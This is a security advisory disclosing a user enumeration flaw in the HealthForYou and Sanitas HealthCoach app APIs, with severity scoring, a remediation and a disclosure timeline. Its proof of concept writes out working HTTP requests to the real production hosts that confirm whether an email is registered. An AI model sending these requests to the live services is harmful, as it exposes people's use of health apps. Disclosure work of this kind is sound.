HealthForYou 1.11.1 / HealthCoach 2.9.2 User Enumeration

`# Trovent Security Advisory 2104-01 #  
#####################################  
  
  
User enumeration through API  
############################  
  
  
Overview  
########  
  
Advisory ID: TRSA-2104-01  
Advisory version: 1.0  
Advisory status: Public  
Advisory URL: https://trovent.io/security-advisory-2104-01  
Affected product: HealthForYou & Sanitas HealthCoach mobile and web applications  
Tested versions: HealthForYou 1.11.1 (com.hansdinslage.connect.HealthForYou),  
HealthCoach 2.9.2 (de.sanitas_online.healthcoach)  
Vendor: Hans Dinslage GmbH (subsidiary of Beurer GmbH https://www.beurer.com)  
Credits: Trovent Security GmbH, Nick Decker  
  
  
Detailed description  
####################  
  
Trovent Security GmbH discovered a vulnerability in the server API of  
the mobile apps Sanitas HealthCoach and HealthForYou.  
The API call "/BHMCWebAPI/User/GetIsUserAlreadyExists/?emailId=" allows  
to easily enumerate registered usernames and email addresses.  
This knowledge could aid an attacker with further exploits as  
demonstrated by TRSA-2104-02.  
  
Severity: Medium  
CVSS Score: 5.3 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)  
CWE ID: CWE-203  
CVE ID: N/A  
  
  
Proof of concept  
################  
  
HealthForYou  
############  
  
Sample request to check if my colleague's email address is registered:  
  
REQUEST:  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
GET /BHMCWebAPI/User/GetIsUserAlreadyExists/[email protected] HTTP/1.1  
Content-Type: application/json; charset=UTF-8  
Accept-Encoding: gzip, deflate  
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)  
Host: sync.healthforyou-lidl.com  
Connection: close  
Content-Length: 0  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
RESPONSE:  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
HTTP/1.1 200 OK  
x-frame-options: SAMEORIGIN  
x-xss-protection: 1; mode=block  
content-type: application/json; charset=utf-8  
content-length: 4  
etag: W/"4-X/5TO4MPCKAyY0ipFgr6/IraRNs"  
date: Wed, 28 Apr 2021 11:25:24 GMT  
x-envoy-upstream-service-time: 118  
server: istio-envoy  
connection: close  
  
true  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
  
HealthCoach  
###########  
  
Sample request to check if my colleague's email address is registered:  
  
REQUEST:  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
GET /BHMCWebAPI/User/GetIsUserAlreadyExists/[email protected] HTTP/1.1  
Content-Type: application/json; charset=UTF-8  
Accept-Encoding: gzip, deflate  
User-Agent: Dalvik/2.1.0 (Linux; U; Android 10; ONEPLUS A6003 Build/QKQ1.190716.003)  
Host: sync.connect-sanitas-online.de  
Connection: close  
Content-Length: 0  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
RESPONSE:  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
HTTP/1.1 200 OK  
x-frame-options: SAMEORIGIN  
x-xss-protection: 1; mode=block  
content-type: application/json; charset=utf-8  
content-length: 4  
etag: W/"4-X/5TO4MPCKAyY0ipFgr6/IraRNs"  
date: Wed, 28 Apr 2021 11:34:02 GMT  
x-envoy-upstream-service-time: 78  
server: istio-envoy  
connection: close  
  
true  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
  
  
Solution / Workaround  
#####################  
  
To mitigate this vulnerability, we recommend to disable this API call.  
In general it is recommended to prevent attackers from enumerating valid usernames.  
  
  
History  
#######  
  
2021-04-27: Vulnerability found  
2021-04-28: Advisory created, vendor and BSI contacted  
2021-04-30: Vendor acknowledged the vulnerability to Trovent and BSI  
2021-06-04: Advisory published  
`